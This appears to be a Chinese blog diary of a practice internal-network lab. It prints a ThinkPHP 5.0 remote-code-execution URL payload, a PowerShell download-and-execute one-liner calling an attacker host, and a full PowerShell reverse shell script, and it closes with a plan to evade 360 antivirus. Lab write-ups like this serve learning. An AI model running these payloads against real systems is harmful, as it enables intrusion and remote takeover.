noone___'s blog
0%

Thunder综合内网打靶日寄

发表于 更新于 分类于

  • 扫描打点

    byd平台需要通过openvpn访问才给靶机 ip

    对于 80tp5.0 ,有rce:

    1
    /?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令]

    注意下url编码

    whoami 得到当前用户是 NT AUTHORITY\LOCAL SERVICE ,低权限的内置服务账户,应该要想办法横向先

    但curl不出来

    套一层 powershell 可以 curl

    1
    powershell+-nop+-c+"curl+http://172.16.233.2:8000"

    拿到反弹shell

    1
    powershell+-nop+-w+hidden+-c+"IEX+(New-Object+System.Net.WebClient).DownloadString('http://172.16.233.2:8000/revshell.ps1')"

    revshell.ps1如下

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    $client = New-Object System.Net.Sockets.TCPClient("攻击机IP", 4444)
    $stream = $client.GetStream()
    $writer = New-Object System.IO.StreamWriter($stream)
    $writer.AutoFlush = $true
    $buffer = New-Object System.Byte[] 1024
    while ($true) {
        $writer.Write("PS " + (pwd).Path + "> ")
        $writer.Flush()
        $read = $stream.Read($buffer, 0, 1024)
        if ($read -le 0) { break }
        $input = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $read)
        $output = try { Invoke-Expression -Command $input 2>&1 } catch { $_ }
        $writer.WriteLine($output)
        $writer.Flush()
    }
    $client.Close()

  • 提权

    靶机不出网

    进去以后是 powershell 的界面,有的地方需要强制转换为文本形式来输出,例:

    由此可以看到:

    但是手动提权失败

    传东西上去也不行

    内存注入也不行

    tasklist /svc 显示进程能看见360,要做免杀了